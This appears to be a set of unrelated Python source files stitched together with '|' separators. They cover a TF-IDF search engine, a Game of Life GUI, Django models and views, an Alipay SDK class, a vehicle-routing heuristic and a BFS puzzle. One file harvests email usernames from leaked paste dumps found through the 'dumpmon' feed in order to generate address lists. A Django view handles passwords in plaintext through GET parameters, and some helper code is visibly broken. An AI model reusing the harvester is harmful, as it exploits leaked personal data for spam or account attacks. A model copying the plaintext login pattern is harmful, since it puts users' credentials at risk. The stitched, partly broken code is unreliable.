def create_inverted_idx(cwd, encoded_files_folder) -> None:
"""Creates and stores a dictionary which maps from encoded words to all the documents containing that word.
Stores the output in a .pickle file and returns None.
Args:
cwd (str): Current working directory
encoded_files_folder (str): subfolder where the encoded plots are stored
"""
inverted_idx = {}
# sorts the files in numerical order (to avoid reading in this order 1 -> 10 -> 100)
file_list = os.listdir(cwd+encoded_files_folder)
file_list = sorted(file_list, key=lambda x:int(os.path.splitext(x)[0]))
# iterates over each word in each document. Inserts key-value pairs in the inverted_idx, where the key is a word (encoded) and the value is a list of all documents containing the word
for file_name in file_list:
with open(cwd+encoded_files_folder + file_name,'rb') as f:
dict_repr = pickle.load(f)
for key in dict_repr:
inverted_idx.setdefault(key, []).append(int(file_name[:-7]))
with open('inverted_idx.pickle', "wb") as g:
pickle.dump(inverted_idx, g)
def create_inverted_idx_2(cwd, encoded_files_folder) -> None:
"""Creates and stores a dictionary which maps from encoded words to all the documents containing that word + the corresponding tfidf score.
Stores the output in a .pickle file and returns None.
Args:
cwd (str): Current working directory
encoded_files_folder (str): subfolder where the encoded plots are stored
"""
inverted_idx2 = {}
#sorts the files in numerical order (to avoid reading in this order 1 -> 10 -> 100)
file_list = os.listdir(cwd+encoded_files_folder)
file_list = sorted(file_list, key=lambda x:int(os.path.splitext(x)[0]))
# iterates over each word in each document. Inserts key-value pairs in the inverted_idx2, where the key is a word (encoded) and the value is a list of tuples of this format (doc_name, term frequency)
docs_count = 0
for file_name in file_list:
docs_count += 1
with open(cwd+encoded_files_folder + file_name,'rb') as f:
dict_repr = pickle.load(f)
for key in dict_repr:
inverted_idx2.setdefault(key, []).append((int(file_name[:-7]), dict_repr[key]))
# iterates over each word in the dict and substitutes the term frequency with the term frequency multiplied by the inverse document frequency
for key in inverted_idx2:
for idx, value in enumerate(inverted_idx2[key]):
inverted_idx2[key][idx] = (value[0], value[1] * math.log(docs_count / len(inverted_idx2[key])))
with open('inverted_idx2.pickle', "wb") as g:
pickle.dump(inverted_idx2, g)
def store_squared_tfidf_per_document(inverted_idx2) -> None:
"""Computes the sum of the squared tfidf scores of a document ( |d| in the cosine similarity formula ),
stores a dictionary with the documents as keys, and the squared sum as values.
Args:
inverted_idx2 (dict): the inverted index with tfidf scores
"""
squared_tfidfs = {}
# iterates over each value and each key of the inverted_idx2, updates the squared_tfidfs per document
for term in inverted_idx2:
for doc, tfidf in inverted_idx2[term]:
squared_tfidfs.setdefault(doc, []).append(tfidf**2)
#sums the squared tfidfs
for doc in squared_tfidfs:
squared_tfidfs[doc] = sum(squared_tfidfs[doc])
with open('squared_tfidf_per_document.pickle', "wb") as g:
pickle.dump(squared_tfidfs,g)
#------------------------------------------------------------HELPER FUNCTIONS----------------------------------------------------------
def encode_query(query, vocabulary):
"""Takes a textual query and a vocabulary (mapping from words to integers), returns the encoded query in a list.
If a word is not in the dictionary, the function returns False.
Args:
query (list): A textual query
vocabulary (dict): Mapping from all words
Returns:
[list or bool]: the encoded query in a list or False
"""
encoded = []
for token in query:
if token in vocabulary:
encoded.append(vocabulary[token])
else:
return False
return encoded
def get_top_k(dic, k):
"""get top k items of a dictionary by value using heaps.
Args:
dic (dict): a dictionary
Returns:
[type]: a list of the top k dict items by value
"""
# convert the dictionary into a list of tuples, swapping key-values
heap = [(-value, key) for key,value in dic.items()] # we temporarily invert the values sign because heapq implements only a min heap
largest = heapq.nsmallest(k, heap)
# swap back key-values and values sign
return [(key, -value) for value, key in largest]
def compute_cosine_similarity(encoded_query, docs_scores, squared_tfidf_per_document) -> dict:
"""Compares a textual query with some documents (which contain all the words in the query)
and computes for each pair their cosine similarity.
We assume that each term of the query has always a score of 1
Args:
encoded_query (list): a textual query, encoded in integers
docs_scores (dict): a dict with documents as keys, and the sum of their tfidf scores for ONLY the words in the query as values
squared_tfidf_per_document (dict): a dict with documents as keys, and the sum of their squared tfidf scores for ALL their words
Returns:
[dict]: a dict with documents as keys, and their cosine similarity with respect to the query as values
"""
similarity_scores = {}
for doc in docs_scores:
cos_similarity = docs_scores[doc] / ((math.sqrt(squared_tfidf_per_document[doc]))*(math.sqrt(len(encoded_query))))
similarity_scores[doc] = cos_similarity
return similarity_scores
#------------------------------------------------------------PRINT FUNCTIONS-----------------------------------------------------------
def print_search_engine_result(result):
"""Prints the first search engine results,
Fetching the data from tsv files.
Args:
result (list): a list of all the documents selected by the search engine
"""
for book in result:
with open(os.getcwd()+'\\tsvs\\'+'article_'+str(book)+'.tsv', 'r', encoding = 'utf-8') as f:
all_fields = f.readlines()[2].split('\t')
print("")
print('--BOOKTITLE--')
print(all_fields[0] + '\n')
print('--PLOT--')
print(all_fields[6] + '\n')
print('--URL--')
print(all_fields[-1] + '\n')
print('----------------------------------------------------------------------------------------------' + '\n')
def print_search_engine_2_result(result):
"""Prints the second search engine results,
Fetching the data from tsv files.
Args:
result (dict): a dict of all the documents selected by the search engine and their similarity score
"""
for book, score in result:
with open(os.getcwd()+'\\tsvs\\'+'article_'+str(book)+'.tsv', 'r', encoding = 'utf-8') as f:
all_fields = f.readlines()[2].split('\t')
print("")
print('--BOOKTITLE--')
print(all_fields[0] + '\n')
print('--PLOT--')
print(all_fields[6] + '\n')
print('--URL--')
print(all_fields[-1] + '\n')
print('--SIMILARITY--')
print(round(score,2), '\n')
print('----------------------------------------------------------------------------------------------' + '\n')
#------------------------------------------------------------SEARCH ENGINES---------------------------------------------------------------
def search_engine(encoded_query, inverted_idx):
"""takes an encoded query and the inverted_idx, searches in the inverted_idx and
returns a list of the documents that contain all the tokens in the query
Args:
encoded_query (list): a textual query, encoded in integer
inverted_idx (dict): a mapping between encoded words (integers) and the documents that contain the word
Returns:
[list]: a list of the documents that contain all the tokens in the query
"""
result = []
if not encoded_query:
return result
else:
# selects only the list corresponding to the words that appear in the query
selected_lists = [inverted_idx[token] for token in encoded_query]
idx = [0] * len(selected_lists) # start at index 0 for each list
lists_len = [len(my_list) for my_list in selected_lists]
selected_lists2 = list(enumerate(selected_lists))
# checks if any list index surpasses the last element
while all([k < m for k, m in zip(idx, lists_len)]):
max_num = max([docs[idx[list_num]] for list_num, docs in selected_lists2]) # get the max document number
# handles the case when each list is pointing at the same value
if all([docs[idx[list_num]] == max_num for list_num, docs in selected_lists2]):
result.append(max_num)
idx = [i+1 for i in idx]
# handles all the other cases, increasing idx on all lists that are not pointing at the max value
else:
j = 0
for my_list in selected_lists:
if my_list[idx[j]] == max_num:
pass
else:
idx[j] += 1
j += 1
return result
def search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, k):
"""takes an encoded query the inverted_idx and the squared_tfidf per document,
searches in the inverted_idx2 and returns the top k documents that are most
similar to the query (and contain all tokens in the query).
Args:
encoded_query (list): a textual query, encoded in integer
inverted_idx2 (dict): a mapping between encoded words (integers) and the documents that contain the word + their tfidf score
squared_tfidf_per_document (dict): a mapping between each document and the the sum of its squared tfidf scores for each word
k (int): number of output documents
Returns:
[dict]: a dictionary of the top k documents that are most similar to the query
"""
result = []
docs_scores = {}
if not encoded_query:
return result
else:
# selects only the list corresponding to the words that appear in the query
selected_lists = [inverted_idx2[token] for token in encoded_query]
idx = [0] * len(selected_lists) # start at index 0 for each list
lists_len = [len(my_list) for my_list in selected_lists]
selected_lists2 = list(enumerate(selected_lists)) # enumerate each of our lists
# checks if any list idx surpasses the last element
while all([k < m for k, m in zip(idx, lists_len)]):
max_num = max([docs[idx[list_num]][0] for list_num, docs in selected_lists2]) # get the max document number between the selected ones
# handles the case when each list is pointing at the same value -> add the document and its score to the result
if all([docs[idx[list_num]][0] == max_num for list_num, docs in selected_lists2]):
docs_scores[max_num] = sum([docs[idx[list_num]][1] for list_num, docs in selected_lists2])
idx = [i+1 for i in idx]
# handles all the other cases, increasing idx on all lists that are not pointing at the max value
else:
j = 0
for my_list in selected_lists:
if my_list[idx[j]][0] == max_num:
pass
else:
idx[j] += 1
j += 1
# computes the cosine similarity for each of the selected docs
all_scores = compute_cosine_similarity(encoded_query, docs_scores, squared_tfidf_per_document)
# returns the top k documents ordered by cos similarity (using heaps)
return get_top_k(all_scores, k)
def search_engine_3(encoded_query, inverted_idx2, squared_tfidf_per_document, uncoded_query):
"""Uses search engine 2 to get the top 10 documents with with highest similarity to the query,
then prompts the user to specify new info, related to the other book fields (e.g. bookTitle, setting, etc.),
adjusts the score based on the new info and returns the top 3 books according to the new score
Args:
encoded_query (list): a textual query, encoded in integer
inverted_idx2 (dict): the inverted index with tfidf scores
squared_tfidf_per_document (dict): |d| of the cosine similarity formula (before sqrt)
uncoded_query (list): the same textual query, not encoded in integers
Returns:
[dic]: the top k documents ranked by the new adjusted score
"""
# apply the second search engine (plot only)
plot_result = search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, 10)
additional_info = []
# maps each additional field to their position in the .tsv files
field_to_idx = {
'booktitle' : 0,
'bookseries' : 1,
'bookauthors' : 2,
'publishingdate': 8,
'characters' : 9,
'setting' : 10
}
# prompts the user to insert additional information
while True:
try:
info = input('please insert additional_info:\n Insert field name followed by ":" and the value\n Type "end" when you are done\n').lower()
if info == 'end':
break
info = info.split(':')
if info[0] in field_to_idx:
additional_info.append(info)
else:
print('field not found, please try again\n')
except:
print('field not found, please try again\n')
final_score = {}
# Iterates over each book from the second search engine output
for doc, score in plot_result:
total_score = score
with open('.\\tsvs\\article_'+str(doc)+'.tsv', 'r', encoding = 'utf-8') as f:
all_fields = f.readlines()[2].split('\t')
all_fields = [preprocess_text(field) for field in all_fields]
# iterates over each additional info and if it matches, adjusts the score
for item in additional_info:
if item[1] in all_fields[field_to_idx[item[0]]]:
total_score += total_score * 1/2
# final score for each document
final_score[doc] = total_score
# return the top 3 documents based on the new scoring
return get_top_k(final_score, 3)
#--------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
cwd = os.getcwd()
encoded_files_folder = "\\encoded_files\\"
#create_inverted_idx(cwd, encoded_files_folder)
#create_inverted_idx_2(cwd, encoded_files_folder)
with open('inverted_idx.pickle', 'rb') as h:
inverted_idx = pickle.load(h)
with open('inverted_idx2.pickle', 'rb') as h:
inverted_idx2 = pickle.load(h)
with open('vocabulary.pickle', 'rb') as q:
vocabulary = pickle.load(q)
#store_squared_tfidf_per_document(inverted_idx2)
with open('squared_tfidf_per_document.pickle', "rb") as q:
squared_tfidf_per_document = pickle.load(q)
query = input('enter your query:\n')
preprocessed_query = preprocess_text(query)
encoded_query = encode_query(preprocessed_query, vocabulary)
print_search_engine_result(search_engine(encoded_query, inverted_idx))
print_search_engine_2_result(search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, 5))
print_search_engine_2_result(search_engine_3(encoded_query, inverted_idx2, squared_tfidf_per_document, preprocessed_query))
|
import docker
import redis
class RedisDB():
def __init__(self, image):
client = docker.from_env()
self.container = client.containers.run(
image=image,
name='redis_container',
ports={6379: 6379},
detach=True,
remove=True # Remove container when stopped
)
self.topic = redis.Redis(host='localhost', port=6379, db=0)
self.agg = redis.Redis(host='localhost', port=6379, db=1)
self.activity = redis.Redis(host='localhost', port=6379, db=2)
def stop(self):
self.container.stop()
|
from django.db import models
class Person(models.Model):
name = models.CharField(max_length=50)
gender = models.CharField(max_length=50)
age = models.IntegerField(default=5)
def __str__(self):
template = '{0.name}'
return template.format(self)
|
# -*- coding:Utf-8 -*-
class BaseController:
def __init__(self, model, viewer):
self.model = model
self.viewer = viewer
|
import tkinter as tk
from time import sleep
import random
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
self.counter = 0
def create_widgets(self):
self.button_arr = [[] for i in range(25)]
for i in range(25):
for j in range(25):
def on_click(row=i, col=j):
cur_color = self.button_arr[row][col]['bg']
# based on the current color, set the opposite color
if cur_color == "black":
self.button_arr[row][col].configure(bg="white")
if cur_color == "white":
self.button_arr[row][col].configure(bg="black")
self.button_arr[i].append(tk.Button(self, bg='white', height=1, width=2,
command=on_click))
self.button_arr[i][j].grid(row=i, column=j, sticky=tk.S)
self.title = tk.Label(self, text="Game of Life", font=("Courier", 36, "bold"))
self.title.grid(row=0, column=25, columnspan=8)
self.gen_number_text = tk.Label(self, text="Generation number:", font=("Courier", 13, "bold"))
self.gen_number_text.grid(row=1, column=28, columnspan=1)
self.gen_number = tk.Label(self, text="0", font=("Courier", 12))
self.gen_number.grid(row=1, column=29)
self.rules1 = tk.Label(self, text="A black cell is alive. A white cell is dead. A cell's neighbors are adjacent")
self.rules1.grid(row=2, column=25, columnspan=8)
self.rules1 = tk.Label(self, text="vertically, horizontally, or diagonally. Evolution occurs according to these rules:")
self.rules1.grid(row=3, column=25, columnspan=8)
self.rules2 = tk.Label(self, text="1. Any live cell with two or three live neighbours survives.")
self.rules2.grid(row=4, column=25, columnspan=8)
self.rules3 = tk.Label(self, text="2. Any dead cell with three live neighbours becomes a live cell.")
self.rules3.grid(row=5, column=25, columnspan=8)
self.rules4 = tk.Label(self, text="3. All other live cells die in the next generation. Similarly, all other dead cells stay dead.")
self.rules4.grid(row=6, column=25, columnspan=8)
self.play = tk.Button(self, text='Play', command=self.on_play)
self.play.grid(row=8, column=29)
self.step = tk.Button(self, text='Step', command=self.on_step)
self.step.grid(row=8, column=30)
self.clear = tk.Button(self, text='Clear', command=self.clear_screen)
self.clear.grid(row=8, column=31)
self.stop = tk.Button(self, text='Stop', command=self.on_stop)
self.stop.grid(row=8, column=32, padx=(0, 10))
self.blinker = tk.Button(self, text='Blinker', command=self.on_blinker)
self.blinker.grid(row=8, column=25, padx=(10, 0))
self.glider = tk.Button(self, text='Glider', command=self.on_glider)
self.glider.grid(row=8, column=26)
self.toad = tk.Button(self, text='Toad', command=self.on_toad)
self.toad.grid(row=8, column=27)
self.random = tk.Button(self, text='Random', command=self.on_random)
self.random.grid(row=8, column=28, sticky=tk.W)
self.message = tk.Message(self, text="The Game of Life is a cellular automaton created by British mathematician John Horton Conway. The game became widely known after being mentioned in a 1970 Scientific American article. The game consists of a collection of cells which live, die, or multiply based on mathematical principles. The game is a powerful example of emergence and self-organization, providing insight into how complex patterns can emerge from the implementation of the game's simple rules. For this reason, the Game of Life has been studied by scholars in fields ranging from biology and physics to philosophy and economics.", font=("Courier", 12))
self.message.config(aspect=200)
self.message.grid(row=10, column=25, padx=(10, 0), columnspan=8, rowspan=14, sticky=tk.N)
def get_neighbors(self, row, col):
coords = [(row-1, col-1), (row-1, col), (row-1, col+1),
(row , col-1), (row , col+1),
(row+1, col-1), (row+1, col), (row+1, col+1)]
neighbors = []
for r, c in coords:
if (r > -1 and r < 25) and (c > -1 and c < 25):
neighbors.append(self.button_arr[r][c])
return neighbors
def on_stop(self):
self.keep_going = False
self.blinker.config(state="normal")
self.glider.config(state="normal")
self.random.config(state="normal")
self.step.config(state="normal")
self.clear.config(state="normal")
self.play.config(state="normal")
def clear_screen(self):
self.on_stop()
for k in range(25):
for f in range(25):
self.button_arr[k][f].configure(bg='white')
self.counter = 0
self.gen_number['text'] = str(self.counter)
def on_blinker(self):
self.button_arr[10][9].configure(bg="black")
self.button_arr[10][10].configure(bg="black")
self.button_arr[10][11].configure(bg="black")
def on_glider(self):
self.button_arr[8][10].configure(bg="black")
self.button_arr[9][11].configure(bg="black")
self.button_arr[10][9].configure(bg="black")
self.button_arr[10][10].configure(bg="black")
self.button_arr[10][11].configure(bg="black")
def on_toad(self):
self.button_arr[10][9].configure(bg="black")
self.button_arr[10][10].configure(bg="black")
self.button_arr[10][11].configure(bg="black")
self.button_arr[11][8].configure(bg="black")
self.button_arr[11][9].configure(bg="black")
self.button_arr[11][10].configure(bg="black")
def on_random(self):
for k in range(25):
for f in range(25):
random_color = random.choice(['black', 'white'])
self.button_arr[k][f].configure(bg=random_color)
def on_play(self):
for k in range(25):
for f in range(25):
self.button_arr[k][f].config(state="disabled")
self.blinker.config(state="disabled")
self.glider.config(state="disabled")
self.random.config(state="disabled")
self.step.config(state="disabled")
self.clear.config(state="disabled")
self.play.config(state="disabled")
self.keep_going = True
while self.keep_going:
self.apply_rules()
sleep(0.2)
for k in range(25):
for f in range(25):
self.button_arr[k][f].config(state="normal")
def on_step(self):
self.apply_rules()
def apply_rules(self):
future_colors = []
for x in range(25):
future_colors.append([])
for y in range(25):
future_colors[-1].append("white")
# apply the rules and build a separate grid of future values
for r in range(25):
for c in range(25):
# Any live cell with fewer than two live neighbours dies, as if by underpopulation.
bg_black_list = []
for n in self.get_neighbors(r, c):
bg = n['bg']
bg_black_list.append(bg == 'black')
# bg_black_list = [bg1 == 'black', bg2 == 'black', bg3 == 'black']
count_bg_black = bg_black_list.count(True)
if self.button_arr[r][c]['bg'] == 'black':
if count_bg_black >= 2 and count_bg_black <= 3:
future_colors[r][c] = "black"
else:
future_colors[r][c] = "white"
if self.button_arr[r][c]['bg'] == 'white':
if count_bg_black == 3:
future_colors[r][c] = "black"
# using the newly built grid of values, change all colors at the same time
for r in range(25):
for c in range(25):
self.button_arr[r][c].configure(bg=future_colors[r][c])
self.button_arr[r][c].update()
# change generation number
self.counter += 1
self.gen_number['text'] = str(self.counter)
root = tk.Tk()
app = Application(master=root)
app.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.RepairItem import RepairItem
class AlipayInsAutoAutoaftermarketInserviceorderNotifyModel(object):
def __init__(self):
self._ant_ser_apply_no = None
self._event_time = None
self._extra = None
self._inst_ser_apply_no = None
self._repair_item = None
self._status = None
@property
def ant_ser_apply_no(self):
return self._ant_ser_apply_no
@ant_ser_apply_no.setter
def ant_ser_apply_no(self, value):
self._ant_ser_apply_no = value
@property
def event_time(self):
return self._event_time
@event_time.setter
def event_time(self, value):
self._event_time = value
@property
def extra(self):
return self._extra
@extra.setter
def extra(self, value):
self._extra = value
@property
def inst_ser_apply_no(self):
return self._inst_ser_apply_no
@inst_ser_apply_no.setter
def inst_ser_apply_no(self, value):
self._inst_ser_apply_no = value
@property
def repair_item(self):
return self._repair_item
@repair_item.setter
def repair_item(self, value):
if isinstance(value, list):
self._repair_item = list()
for i in value:
if isinstance(i, RepairItem):
self._repair_item.append(i)
else:
self._repair_item.append(RepairItem.from_alipay_dict(i))
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
def to_alipay_dict(self):
params = dict()
if self.ant_ser_apply_no:
if hasattr(self.ant_ser_apply_no, 'to_alipay_dict'):
params['ant_ser_apply_no'] = self.ant_ser_apply_no.to_alipay_dict()
else:
params['ant_ser_apply_no'] = self.ant_ser_apply_no
if self.event_time:
if hasattr(self.event_time, 'to_alipay_dict'):
params['event_time'] = self.event_time.to_alipay_dict()
else:
params['event_time'] = self.event_time
if self.extra:
if hasattr(self.extra, 'to_alipay_dict'):
params['extra'] = self.extra.to_alipay_dict()
else:
params['extra'] = self.extra
if self.inst_ser_apply_no:
if hasattr(self.inst_ser_apply_no, 'to_alipay_dict'):
params['inst_ser_apply_no'] = self.inst_ser_apply_no.to_alipay_dict()
else:
params['inst_ser_apply_no'] = self.inst_ser_apply_no
if self.repair_item:
if isinstance(self.repair_item, list):
for i in range(0, len(self.repair_item)):
element = self.repair_item[i]
if hasattr(element, 'to_alipay_dict'):
self.repair_item[i] = element.to_alipay_dict()
if hasattr(self.repair_item, 'to_alipay_dict'):
params['repair_item'] = self.repair_item.to_alipay_dict()
else:
params['repair_item'] = self.repair_item
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsAutoAutoaftermarketInserviceorderNotifyModel()
if 'ant_ser_apply_no' in d:
o.ant_ser_apply_no = d['ant_ser_apply_no']
if 'event_time' in d:
o.event_time = d['event_time']
if 'extra' in d:
o.extra = d['extra']
if 'inst_ser_apply_no' in d:
o.inst_ser_apply_no = d['inst_ser_apply_no']
if 'repair_item' in d:
o.repair_item = d['repair_item']
if 'status' in d:
o.status = d['status']
return o
|
import random
import re
import requests
from twitter_scraper import get_tweets
#-----------------------------------------------------------------------------------------------------------------------------
# TODO: will make this more interactive, may use a class here.
# TODO: May use generator here...
domains_list = [domain.rstrip('\n') for domain in open('data/domains.txt')]
# set up this word list from my phone in a bar, so pardon the liquor names in there.
#---------------------------------------------------------
def genEmail(length=1,pages=1):
userlist = getUsers(pages)
if len(userlist) < length:
return "Sorry we were only able to gather {} of the requested {} users try increasing pages".format(len(userlist),length)
return [random.choice(userlist) + random.choice(domains_list) for _ in range(length)]
def getDumpUrl(pages):
print("Gathering Links")
urls = []
for tweet in get_tweets('dumpmon', pages=pages):
urls.append(re.findall(r"(https?:\/\/(?:www\.|(?!www))[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\.[^\s]{2,}|www\.[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\.[^\s]{2,}|https?:\/\/(?:www\.|(?!www))[a-zA-Z0-9]\.[^\s]{2,}|www\.[a-zA-Z0-9]\.[^\s]{2,})", tweet['text']))
return urls
def getUsers(pages):
urls = getDumpUrl(pages)
e = []
users = []
print('Extracting Emails')
for url in urls:
s = str(url)[2:-2]
r = requests.get(s)
content = str(r.content)
emails = re.findall(r"[a-zA-Z0-9_.+-]+@", content)
for email in emails:
if email.find('-')==-1:
e.append(email)
#print(email)
print('Building user list')
for email in e:
if len(email)>5 and len(email)<24:
#print(email, len(email))
ind = len(email)-2
user = email[0:ind]
if re.match('^(?=.*[a-zA-Z])', user):
users.append(user)
users = list(set(users)) #Remove duplicates
for u in users:
for c in u:
if c.isdigit():
c = replaceDigit(c)
print("Collected {} users".format(len(users)))
return users
def replaceDigit(digit):
d = random.randrange(0,9)
if d != digit:
return d
else:
replaceDigit(d)
|
from requests import models
from botocore.compat import HTTPHeaders
class AWSRequest(models.RequestEncodingMixin, models.Request):
def __init__(self, *args, **kwargs):
self.auth_path = None
if 'auth_path' in kwargs:
self.auth_path = kwargs['auth_path']
del kwargs['auth_path']
models.Request.__init__(self, *args, **kwargs)
headers = HTTPHeaders()
if self.headers is not None:
for key, value in self.headers.items():
headers[key] = value
self.headers = headers
def prepare(self):
"""Constructs a :class:`AWSPreparedRequest <AWSPreparedRequest>`."""
# Eventually I think it would be nice to add hooks into this process.
p = AWSPreparedRequest(self)
p.prepare_method(self.method)
p.prepare_url(self.url, self.params)
p.prepare_headers(self.headers)
p.prepare_cookies(self.cookies)
p.prepare_body(self.data, self.files)
p.prepare_auth(self.auth)
return p
@property
def body(self):
p = models.PreparedRequest()
p.prepare_headers({})
p.prepare_body(self.data, self.files)
return p.body
class AWSPreparedRequest(models.PreparedRequest):
"""Represents a prepared request.
:ivar method: HTTP Method
:ivar url: The full url
:ivar headers: The HTTP headers to send.
:ivar body: The HTTP body.
:ivar hooks: The set of callback hooks.
In addition to the above attributes, the following attributes are
available:
:ivar query_params: The original query parameters.
:ivar post_param: The original POST params (dict).
"""
def __init__(self, original_request):
self.original = original_request
super(AWSPreparedRequest, self).__init__()
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.urls import path, include
from .models import User
def setData(request):
req_code = request.GET.get("req_code")
if req_code is not None:
if req_code == "find":
try:
userid = request.GET.get("userid")
data = User.objects.get(userid=userid)
except Exception:
return HttpResponse("Success") # 중복 아이디가 없으므로 사용가능
return HttpResponse("Fail") # 중복 아이디가 있습니다
elif req_code == "login":
try:
userid = request.GET.get("userid")
userpw = request.GET.get("userpw")
data = User.objects.get(userid=userid, userpw=userpw)
except Exception:
return HttpResponse("Fail")
return HttpResponse("Success")
elif req_code == "user_create":
try:
userid = request.GET.get("userid")
userpw = request.GET.get("userpw")
phone = request.GET.get("phone")
birth_date = request.GET.get("date")
addr = request.GET.get("addr")
gender = request.GET.get("gend")
email = request.GET.get("email")
if email is None:
addData = User(userid=userid, userpw=userpw, phone_num=phone, birth_date=birth_date, addr=addr,
gender=gender)
else:
addData = User(userid=userid, userpw=userpw, phone_num=phone, birth_date=birth_date, addr=addr,
gender=gender, email=email)
addData.save()
except Exception:
return HttpResponse("Fail")
return HttpResponse("Success")
else:
return HttpResponse("해당하는 REQ_CODE가 없거나 누락되어있습니다...")
return HttpResponse("Hello Django~!")
# 향후 구현예정 전화번호 01012319900 > 010-1231-9900 메서드 구현
# 향후 구현예정 생년월일 19980101 > 1998-01-01 메서드 구현
# 향후 구현예정 회원가입 후 이메일 인증 구현 SMTP
|
#!/usr/bin/env python
"""
wc.py
!! Runs pretty quickly, even on problems w/ 60k nodes
!! For larger problems, could avoid explicitly computing the distance matrix
"""
import numpy as np
from time import time
from tqdm import tqdm
from tsplib95 import parser
from scipy.spatial.distance import cdist, pdist, squareform
# --
# IO
inpath = '/Users/bjohnson/projects/routing/RoutingSolver/instances/VRPXXL/Antwerp1.txt'
prob = parser.parse(open(inpath).read())
cap = prob['CAPACITY']
n_customers = prob['DIMENSION'] - 1
cw_neighbors = 100
MAX_TOUR_LENGTH = np.inf
coords = list(prob['NODE_COORD_SECTION'].values())
depot, customers = coords[0], coords[1:]
demand = list(prob['DEMAND_SECTION'].values())
demand = demand[1:]
demand = np.array(demand).astype(np.int)
# --
# Compute distance matrix
dist = squareform(pdist(np.array(customers)))
np.fill_diagonal(dist, np.inf)
dist_to_depot = cdist(np.array(depot).reshape(1, -1), customers).squeeze()
# --
# Compute savings
sdist_idx = np.argsort(dist, axis=-1)[:,:cw_neighbors]
sdist_val = np.sort(dist, axis=-1)[:,:cw_neighbors]
saving = dist_to_depot.reshape(-1, 1) + dist_to_depot[sdist_idx] - sdist_val
# saving[saving < 0.1] = 0.1
srcs = np.repeat(np.arange(n_customers), cw_neighbors)
dsts = sdist_idx.ravel()
vals = saving.ravel()
p = np.argsort(-vals, kind='stable')
srcs, dsts, vals = srcs[p], dsts[p], vals[p]
sel = srcs < dsts
srcs, dsts, vals = srcs[sel], dsts[sel], vals[sel]
srcs = list(srcs.astype(int))
dsts = list(dsts.astype(int))
vals = list(vals)
dist_lookup = {}
for src, dst, d in zip(srcs, dsts, dist[(srcs, dsts)]):
dist_lookup[(src, dst)] = d
dist_lookup[(dst, src)] = d
del dist
del sdist_idx
del sdist_val
del saving
# --
# Clark-Wright functions
def new_route(src, dst):
global route_idx
load = demand[src] + demand[dst]
cost = dist_to_depot[src] + dist_lookup[(src, dst)] + dist_to_depot[dst]
if load > cap:
return
r = {
"idx" : route_idx,
"nodes" : [src, dst],
"load" : load,
"cost" : cost,
}
visited.add(src)
visited.add(dst)
boundary.add(src)
boundary.add(dst)
node2route[src] = route_idx
node2route[dst] = route_idx
routes[route_idx] = r
route_idx += 1
def extend_route(a, b):
r = routes[node2route[a]]
new_load = r['load'] + demand[b]
new_cost = r['cost'] + dist_lookup[(a, b)] + dist_to_depot[b] - dist_to_depot[a]
if new_load > cap:
return
if r['nodes'][0] == a:
r['nodes'].insert(0, b)
elif r['nodes'][-1] == a:
r['nodes'].append(b)
else:
raise Exception
r['load'] = new_load
r['cost'] = new_cost
node2route[b] = r['idx']
visited.add(b)
boundary.remove(a)
boundary.add(b)
def merge_route(src, dst):
global route_idx
if node2route[src] == node2route[dst]:
return
r_src = routes[node2route[src]]
r_dst = routes[node2route[dst]]
new_load = r_src['load'] + r_dst['load']
new_cost = r_src['cost'] + r_dst['cost'] + dist_lookup[(src, dst)] - dist_to_depot[src] - dist_to_depot[dst]
if new_load > cap:
return
# reverse direction to fit
if r_src['nodes'][-1] != src:
r_src['nodes'] = r_src['nodes'][::-1]
if r_dst['nodes'][0] != dst:
r_dst['nodes'] = r_dst['nodes'][::-1]
r = {
"idx" : route_idx,
"nodes" : r_src['nodes'] + r_dst['nodes'],
"load" : new_load,
"cost" : new_cost,
}
del routes[node2route[src]]
del routes[node2route[dst]]
for n in r['nodes']:
node2route[n] = route_idx
boundary.remove(src)
boundary.remove(dst)
routes[route_idx] = r
route_idx += 1
routes = {}
visited = set([])
boundary = set([])
node2route = {}
route_idx = 0
t = time()
for (src, dst, val) in zip(srcs, dsts, vals):
if (src in visited) and (src not in boundary):
pass
elif (dst in visited) and (dst not in boundary):
pass
elif (src not in visited) and (dst not in visited):
new_route(src, dst)
elif (src in boundary) and (dst not in visited):
extend_route(src, dst)
elif (dst in boundary) and (src not in visited):
extend_route(dst, src)
elif (src in boundary) and (dst in boundary):
merge_route(src, dst)
else:
raise Exception
print(time() - t)
# fix customers that haven't been visited
if len(visited) != n_customers:
for n in range(n_customers):
if n not in visited:
routes[route_idx] = {
"idx" : route_idx,
"nodes" : [n],
"load" : demand[n],
"cost" : 2 * dist_to_depot[n],
}
route_idx += 1
total_cost = sum([r['cost'] for r in routes.values()])
print(total_cost)
# 498791.9977090355 |
# TomaTo Probleam
# BFS는 queue를 구현해서 만들어야 한다.
def main():
# M은 상자의 가로(col), N은 상자의 세로(row)
M,N = map(int, input().split())
box = [list(map(int, input().split())) for i in range(N)]
days = 0
queue = []
for i in range(N):
for j in range(M):
if box[i][j] == 1:
queue.append((j,i))
while True:
box, queue = BFS(box, queue, N, M)
if queue == []:
break;
days +=1
for i in range(N):
for j in range(M):
if box[i][j] == 0:
days = -1
print(days)
def BFS(box, queue, N,M):
dir = [(1, 0), (-1, 0), (0, 1), (0, -1)]
after_map = []
for location in queue:
for direction in dir:
newX = location[0]+direction[0]
newY = location[1]+direction[1]
if (0 <=newX< M) and (0<=newY<N) :
if box[newY][newX] == 0:
after_map.append((newX,newY))
box[newY][newX] = 1
return box, after_map
if __name__ =='__main__':
main() |
#least squaresfit
import numpy as np
from matplotlib import pylab as plt
from scipy.optimize import leastsq
import matplotlib.gridspec as gridspec
